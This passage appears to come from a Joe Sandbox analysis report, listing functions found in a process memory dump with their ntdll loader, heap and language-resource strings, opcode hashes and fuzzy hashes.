                                                                                                                            • API String ID: 0-161242083
                                                                                                                            • Opcode ID: 88a6a807eca2cc736494e068c7ec515b9290a734c10e8680d70dfa42b691361d
                                                                                                                            • Instruction ID: 800117b680e084bad93312fcf5862fb6d086ec60b5119374272390934a6c117e
                                                                                                                            • Opcode Fuzzy Hash: 88a6a807eca2cc736494e068c7ec515b9290a734c10e8680d70dfa42b691361d
                                                                                                                            • Instruction Fuzzy Hash: 9F71BD70A002059FDF2DEF68C981BBEB7B4EB58604F1540ADE906EB651E774EA42CB50
                                                                                                                            Function 01BCC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01C082E8
                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 01C082D7
                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 01C082DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-1783798831
                                                                                                                            • Opcode ID: fe1baf74ec72e6081a978280446e57a49ad7eaea765b2762018a9f2ab8e6b80d
                                                                                                                            • Instruction ID: 40c33cd182aa4cabc428ffd23fbd57360f21f40daa75613a813c6c7f8783144d
                                                                                                                            • Opcode Fuzzy Hash: fe1baf74ec72e6081a978280446e57a49ad7eaea765b2762018a9f2ab8e6b80d
                                                                                                                            • Instruction Fuzzy Hash: 7241E6B1544311EBCB29EB68D884B6F7BE8EFA4B54F00456EB949D7290E770D800CB91
                                                                                                                            Function 01C4C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • PreferredUILanguages, xrefs: 01C4C212
                                                                                                                            • @, xrefs: 01C4C1F1
                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01C4C1C5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                            • API String ID: 0-2968386058
                                                                                                                            • Opcode ID: 7716324260a691b67867f524642ae28dc33901b54d48ed39263a1cb2446a19b5
                                                                                                                            • Instruction ID: c7bf029fa01d1fb09e7dd6903d1fcc9413c21f05520daab8bd99aec5756bef6e
                                                                                                                            • Opcode Fuzzy Hash: 7716324260a691b67867f524642ae28dc33901b54d48ed39263a1cb2446a19b5
                                                                                                                            • Instruction Fuzzy Hash: C6416271E0520AEBDF25DFD9C841BEEBBB8AB14704F14406AE605E7250E7B4DA44CB54
                                                                                                                            Function 01C24144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                            • API String ID: 0-1373925480
                                                                                                                            • Opcode ID: 71df016228af31f1f4edba979c9bd01f562a2fbac84ed1890818389ec616d4df
                                                                                                                            • Instruction ID: 8d397151f518040d36cacd113db3956d1ce37d59594ea8509cb8de42df364d5f
                                                                                                                            • Opcode Fuzzy Hash: 71df016228af31f1f4edba979c9bd01f562a2fbac84ed1890818389ec616d4df
                                                                                                                            • Instruction Fuzzy Hash: 3F41E431A04269CBEB2ADBDAC844BADBBF4FF56340F240499D941EB791DB74CA01CB51
                                                                                                                            Function 01C14755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • LdrpCheckRedirection, xrefs: 01C1488F
                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01C14888
                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01C14899
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                            • API String ID: 0-3154609507
                                                                                                                            • Opcode ID: ce8016fa1764d8d346433ba2a6523dd7e8c339e0ed5d52de28abda03289a3f91
                                                                                                                            • Instruction ID: 67ab844a88ed37a571f0a02528f4ebe54837621cae438a5914b14e59cab127b9
                                                                                                                            • Opcode Fuzzy Hash: ce8016fa1764d8d346433ba2a6523dd7e8c339e0ed5d52de28abda03289a3f91
                                                                                                                            • Instruction Fuzzy Hash: 3241D172A84251CFDB2ACE5DD840A267BE4AF8AB50F09056DED49D7319D730D900EBC1
                                                                                                                            Function 01BA0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 0-2558761708
                                                                                                                            • Opcode ID: 638b3ac39dc4d45b3697ca07473959a3b0d0065db99bb1db11487b7f0b3f4140
                                                                                                                            • Instruction ID: f2f65338bb00aacaeac8c739c3e1b0af56725e8e66e9a13991954834faa3d642
                                                                                                                            • Opcode Fuzzy Hash: 638b3ac39dc4d45b3697ca07473959a3b0d0065db99bb1db11487b7f0b3f4140
                                                                                                                            • Instruction Fuzzy Hash: BD11DF31318142DFDB2DEA28C580B6AB3A4EF50A16F9882EDF506CB265DB34E848C755
                                                                                                                            Function 01C120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • LdrpInitializationFailure, xrefs: 01C120FA
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01C12104
                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 01C120F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-2986994758
                                                                                                                            • Opcode ID: 20f196aa564a5e71fc1ce5fe02be065d56dca16409718b76c036b081fb43392a
                                                                                                                            • Instruction ID: 378bbdeab7359b5bc620187d906ebc7d976617b61747b34de2b64235c2fe84ac
                                                                                                                            • Opcode Fuzzy Hash: 20f196aa564a5e71fc1ce5fe02be065d56dca16409718b76c036b081fb43392a
                                                                                                                            • Instruction Fuzzy Hash: 8CF02875680308EBE728E64DCC43F993B68FB52B04F210098FA0077285D2B0EA41D650
                                                                                                                            Function 01BA03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: #%u
                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                            • Opcode ID: 734c44e7755a252d7193b5ac97fba5759f38611362658978d5077d722e9a8e9b
                                                                                                                            • Instruction ID: 9661fb282fe6018f4598ec499499c83a53f529360a8ddb99f92bb4b088ab1675
                                                                                                                            • Opcode Fuzzy Hash: 734c44e7755a252d7193b5ac97fba5759f38611362658978d5077d722e9a8e9b
                                                                                                                            • Instruction Fuzzy Hash: 09713C71A0014ADFDB19DF98C990BAEB7F8FF18704F1440A9EA05A7251EB34ED45CBA1
                                                                                                                            Function 01B9A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • LdrResSearchResource Exit, xrefs: 01B9AA25
                                                                                                                            • LdrResSearchResource Enter, xrefs: 01B9AA13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                            • API String ID: 0-4066393604
                                                                                                                            • Opcode ID: d8deed8cae2862761fab052e36f8d473d248ee2346ead0b102aa1236c816ddd1
                                                                                                                            • Instruction ID: 3163eb65eaa7eeeb15d99c0166f3ce1d747ade5b2374d10f31f4ebbb02697f43
                                                                                                                            • Opcode Fuzzy Hash: d8deed8cae2862761fab052e36f8d473d248ee2346ead0b102aa1236c816ddd1
                                                                                                                            • Instruction Fuzzy Hash: 65E18471A002199BEF29DFA9C980BAEBBB9FF08310F1045BAEA01E7251D774D945CB50
                                                                                                                            Function 01C5A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: `$`
                                                                                                                            • API String ID: 0-197956300
                                                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                            • Instruction ID: 12c35485d7ebfa86902ec2e66dc85baa8dcfb991e932f55bf7012f21849c878c
                                                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                            • Instruction Fuzzy Hash: 7BC1D331204342DBEB65CF2AC840B2BBBE5AFC4358F044A2DFA9687291D774D685CB59
                                                                                                                            Function 01C0E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                            • Opcode ID: aaa215d1176c9721c793a261a64cf9ee959985f12be7572aebb46f4b5b4353f2
                                                                                                                            • Instruction ID: da7a46c8270d462dcb700e2bd8be6e3c7bcd97d70017760ef3f626e741381082
                                                                                                                            • Opcode Fuzzy Hash: aaa215d1176c9721c793a261a64cf9ee959985f12be7572aebb46f4b5b4353f2
                                                                                                                            • Instruction Fuzzy Hash: DC616B71E44209DFDB29DFAD8840BADBBB9FB48700F14496DE649EB291D731EA40CB50
                                                                                                                            Function 01C343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$MUI
                                                                                                                            • API String ID: 0-17815947
                                                                                                                            • Opcode ID: b59494269ede6fa95b61480025d92a4fe71974fc6402ab8659d71619947fde61
                                                                                                                            • Instruction ID: 49a83621a320bc92c3dd09d83e053af472a3a54a2e04797a64edd20d7cd11e80
                                                                                                                            • Opcode Fuzzy Hash: b59494269ede6fa95b61480025d92a4fe71974fc6402ab8659d71619947fde61
                                                                                                                            • Instruction Fuzzy Hash: F9513771E0021DAFDF19DFA9CC80AEEBBB8EB44754F100569E611B7290E7349E45CB60
                                                                                                                            Function 01B904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • kLsE, xrefs: 01B90540
                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01B9063D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                            • API String ID: 0-2547482624
                                                                                                                            • Opcode ID: 936be332dbd28251980a1d6b535066f561c6c7572830006af3d354d3870aeba9
                                                                                                                            • Instruction ID: 9faac4fcb759c6cc3f6bb7482d5efb5b5910f7606768ab983de22fbdee57e25a
                                                                                                                            • Opcode Fuzzy Hash: 936be332dbd28251980a1d6b535066f561c6c7572830006af3d354d3870aeba9
                                                                                                                            • Instruction Fuzzy Hash: 5151B5715047429FDB28EF68C5806A7BBE9EF84304F10487EFADA87241E774D546CB91
                                                                                                                            Function 01B9A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 01B9A309
                                                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 01B9A2FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                            • API String ID: 0-2876891731
                                                                                                                            • Opcode ID: cbc44ce649c7c739075959417925884359aec7c8784e6bbd0227c0941389fbfa
                                                                                                                            • Instruction ID: 31e79f38dd4ea89673040b1824635b6a98559124594cc60f46db92fbeb19a3af
                                                                                                                            • Opcode Fuzzy Hash: cbc44ce649c7c739075959417925884359aec7c8784e6bbd0227c0941389fbfa
                                                                                                                            • Instruction Fuzzy Hash: BE418E31A08649DBDF29CF69C480B69BBB4FF85704F1541E9EE01DB252E3B5D941CB50
                                                                                                                            Function 01BCA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                            • Opcode ID: 6659a28e130d72f8ed246200272b007fa5bece30778f4d8ee85961521ada9ca3
                                                                                                                            • Instruction ID: f29902cb8de3781f0c394f94925be64e679ee46e71de8d41248782ca4cd89adc
                                                                                                                            • Opcode Fuzzy Hash: 6659a28e130d72f8ed246200272b007fa5bece30778f4d8ee85961521ada9ca3
                                                                                                                            • Instruction Fuzzy Hash: 2501DCB2250788AFD325DF24CD45B2677E8EBA4B29F0089BDB648C7190E334E804CB46
                                                                                                                            Function 01B9C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: MUI
                                                                                                                            • API String ID: 0-1339004836
                                                                                                                            • Opcode ID: cbd2056ddf8350f588c786dfb297efd44b0bd47ea19cb6d407e114441501fd9a
                                                                                                                            • Instruction ID: 15c7ba5fe36690eb9fd3d707c1f920efe57d94ad4990b554be77531d6e24e119
                                                                                                                            • Opcode Fuzzy Hash: cbd2056ddf8350f588c786dfb297efd44b0bd47ea19cb6d407e114441501fd9a
                                                                                                                            • Instruction Fuzzy Hash: 3A824A75E002198BEF29CFA9C980BEDBBB5FF49710F1481B9D919AB351D730A942CB50
                                                                                                                            Function 01C16420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: 23712d58e06b54c9ecd936d00c6c50860d60bee85b5b1eef803393b05d2e6862
                                                                                                                            • Instruction ID: 833ce8ccb27edf0362a6972fcbef048ea0e0a20d2074a10a5947a9a0d734f1f1
                                                                                                                            • Opcode Fuzzy Hash: 23712d58e06b54c9ecd936d00c6c50860d60bee85b5b1eef803393b05d2e6862
                                                                                                                            • Instruction Fuzzy Hash: 50916071941229EFEB25DB99CC85FAEBBB9EF15750F100065F600AB194D7B4EE00DBA0
                                                                                                                            Function 01C3E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: 20710beb8efe1e19bc31b08f85c6e2f31a3942ac5086ed6221fa461a492e734b
                                                                                                                            • Instruction ID: 41b0ae435663f4fe52ca34bbcc25007128370cf5592b7781c20fb0d363bd8bda
                                                                                                                            • Opcode Fuzzy Hash: 20710beb8efe1e19bc31b08f85c6e2f31a3942ac5086ed6221fa461a492e734b
                                                                                                                            • Instruction Fuzzy Hash: 07918C71901609EEDF26ABA5DC84FEFBBB9EF85B40F100029F501A7251EB75DA41CB90
                                                                                                                            Function 01BCA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: GlobalTags
                                                                                                                            • API String ID: 0-1106856819
                                                                                                                            • Opcode ID: 42002011db4e6b8d1ec672798072c16bbd65a5c8ea6207998b6236d2a1078688
                                                                                                                            • Instruction ID: 7af20f4bfeb7e00ae51903f19b051dfa344d27ffc574a6ac5690aa8098f391c7
                                                                                                                            • Opcode Fuzzy Hash: 42002011db4e6b8d1ec672798072c16bbd65a5c8ea6207998b6236d2a1078688
                                                                                                                            • Instruction Fuzzy Hash: 607181B5E0022ACFDF29CFADC5906ADBBB1BF48710F14816EE505A7281E771CA51CB50
                                                                                                                            Function 01C34978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .mui
                                                                                                                            • API String ID: 0-1199573805
                                                                                                                            • Opcode ID: 4a9f9b5606a70acef6e247f9a8f26129ac47414b8b655bf3430796f385a7dc87
                                                                                                                            • Instruction ID: 9ef4129caabecbe18c6603a0416c0a2a0418ebff4be9d6b63d2f984294a3c60e
                                                                                                                            • Opcode Fuzzy Hash: 4a9f9b5606a70acef6e247f9a8f26129ac47414b8b655bf3430796f385a7dc87
                                                                                                                            • Instruction Fuzzy Hash: 5A51C172D0122ADBDF1CDF99D844AEEBBB8AF54A14F054169EA11BB210D334CD02CBE4
                                                                                                                            Function 01BAE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: EXT-
                                                                                                                            • API String ID: 0-1948896318
                                                                                                                            • Opcode ID: 54a78933e663344e756e34e9d7fc79c29562a67895c7d7487df4e2cbeac2db5b
                                                                                                                            • Instruction ID: 04b6c3a88a5d4bc1cc0d687eb8c036b5b09c75f6a35d5d1ecf388a2d80a42ed9
                                                                                                                            • Opcode Fuzzy Hash: 54a78933e663344e756e34e9d7fc79c29562a67895c7d7487df4e2cbeac2db5b
                                                                                                                            • Instruction Fuzzy Hash: AD41737250C3029BDB29DA79C980B6BBBE8EF88714F840AADF684D7140E774D904C797
                                                                                                                            Function 01C0C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: BinaryHash
                                                                                                                            • API String ID: 0-2202222882
                                                                                                                            • Opcode ID: fc453b66edccde29daa1e0e00364cf75a182f2d11785a3597963d708ccdd6efc
                                                                                                                            • Instruction ID: 85d53321341dfce1541829948a87cbbeefe7a99515e7d2e4dd14c55409c48f17
                                                                                                                            • Opcode Fuzzy Hash: fc453b66edccde29daa1e0e00364cf75a182f2d11785a3597963d708ccdd6efc
                                                                                                                            • Instruction Fuzzy Hash: 344145B1D0052DEBDF25DA50CC84FDEB77CAB45714F0046E5A608AB180DB709F898F98
                                                                                                                            Function 01C26B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #
                                                                                                                            • API String ID: 0-1885708031
                                                                                                                            • Opcode ID: 3e46c775d0e008d2bd9225ee6370dbd8d22553ee1c5de11ef8c8aab5950ee9a4
                                                                                                                            • Instruction ID: ec6b40f0ad0fa762504be0ffb738750f2acaaa3ec73b4572c307df5e08729fc7
                                                                                                                            • Opcode Fuzzy Hash: 3e46c775d0e008d2bd9225ee6370dbd8d22553ee1c5de11ef8c8aab5950ee9a4
                                                                                                                            • Instruction Fuzzy Hash: 97315931A00779DBEB26EF69C844BEE7BB8EF04704F544068ED41AB282DB75D905CB60
                                                                                                                            Function 01C0CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: BinaryName
                                                                                                                            • API String ID: 0-215506332
                                                                                                                            • Opcode ID: 5a6f7c1cf852304fe8504cc434c386e2ab876ad51445bb872ec733b2e824f34e
                                                                                                                            • Instruction ID: 8b3b640c24ea6c2ffe7452a5be6265eea98af0f8556629fb2728933dcd9bf433
                                                                                                                            • Opcode Fuzzy Hash: 5a6f7c1cf852304fe8504cc434c386e2ab876ad51445bb872ec733b2e824f34e
                                                                                                                            • Instruction Fuzzy Hash: B5312536900915EFEB1ADB59C845E7FBB74EF80720F0142A9EA01A7690D730DE40DBE4
                                                                                                                            Function 01C1892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01C1895E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                            • API String ID: 0-702105204
                                                                                                                            • Opcode ID: ba1adaa3098cfdd248d3be77680bc53eb3555b6adb29fc8d67558e54089735c4
                                                                                                                            • Instruction ID: 9d3266d2712c40e302e8e5fbb05f6ba566901d7474ff639259324e8e1a45c27a
                                                                                                                            • Opcode Fuzzy Hash: ba1adaa3098cfdd248d3be77680bc53eb3555b6adb29fc8d67558e54089735c4
                                                                                                                            • Instruction Fuzzy Hash: 6601FC31284241DBDB257A5688C4B6A7B66EF93664F04006CF64206159CF60E881E792
                                                                                                                            Function 01C32000 Relevance: .8, Instructions: 757COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
